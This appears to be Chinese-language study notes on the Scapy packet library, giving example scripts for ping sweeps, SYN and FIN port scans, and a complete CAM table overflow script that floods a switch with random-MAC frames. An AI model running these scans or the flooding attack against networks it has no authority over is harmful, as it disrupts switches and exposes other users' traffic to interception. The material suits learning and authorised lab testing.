一、环境搭建
- 安装:pip install scapy
- 官方文档:https://scapy.readthedocs.io/en/latest/index.html
二、应用举例
ping
#!/usr/bin/env python
#*-* coding:utf-8 -*-
from scapy.all import *
#TCP SYN Ping
ans,unans=sr( IP(dst="192.168.2.101-103")/TCP(dport=80,flags="S") )
ans.summary( lambda s,r : r.sprintf("%IP.src% is alive") )
#TCP ACK Ping
ans, unans = sr(IP(dst='192.168.2.101-105')/TCP(dport=80, flags='A'))
ans.summary(lambda s,r : r.sprintf('{IP: %IP.src% is alive}'))
#ARP Ping
ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.56.0/24"),timeout=2)
ans.summary(lambda s,r : r.sprintf("%Ether.src% %ARP.psrc%") )
#ICMP Ping
ans,unans=sr(IP(dst="192.168.56.99-110")/ICMP())
ans.summary( lambda s,r : r.sprintf("{IP: %IP.src% is alive}") )
scan
#!/usr/bin/env python
#*-* coding:utf-8 -*-
from scapy.all import *
#SYN Scan
ans, unans = sr(IP(dst="192.168.56.90")/TCP(dport=(20,24),flags="S"))
ans.summary( lambda s,r : r.sprintf("%TCP.sport% \t %TCP.flags%") )
#FIN Scan
fin_packet = IP(dst='192.168.56.102')/TCP(dport=4444,flags='F')
resp = sr1(fin_packet)
attack
#-------------------------------------------------------------------------------#
# A script to perform CAM overflow attack on Layer 2 switches #
# Bharath(github.com/yamakira) #
# #
# CAM Table Overflow is flooding a switche's CAM table #
# with a lot of fake entries to drive the switch into HUB mode. #
# (Send thousands of Ether packets with random MAC addresses in each packet) #
#-------------------------------------------------------------------------------#
#!/usr/bin/env python
from scapy.all import Ether, IP, TCP, RandIP, RandMAC, sendp
'''Filling packet_list with ten thousand random Ethernet packets
CAM overflow attacks need to be super fast.
For that reason it's better to create a packet list before hand.
'''
def generate_packets():
packet_list = [] #initializing packet_list to hold all the packets
for i in xrange(1,10000):
packet = Ether(src = RandMAC(),dst= RandMAC())/IP(src=RandIP(),dst=RandIP())
packet_list.append(packet)
return packet_list
def cam_overflow(packet_list):
sendp(packet_list, iface='tap0')
if __name__ == '__main__':
packet_list = generate_packets()
cam_overflow(packet_list)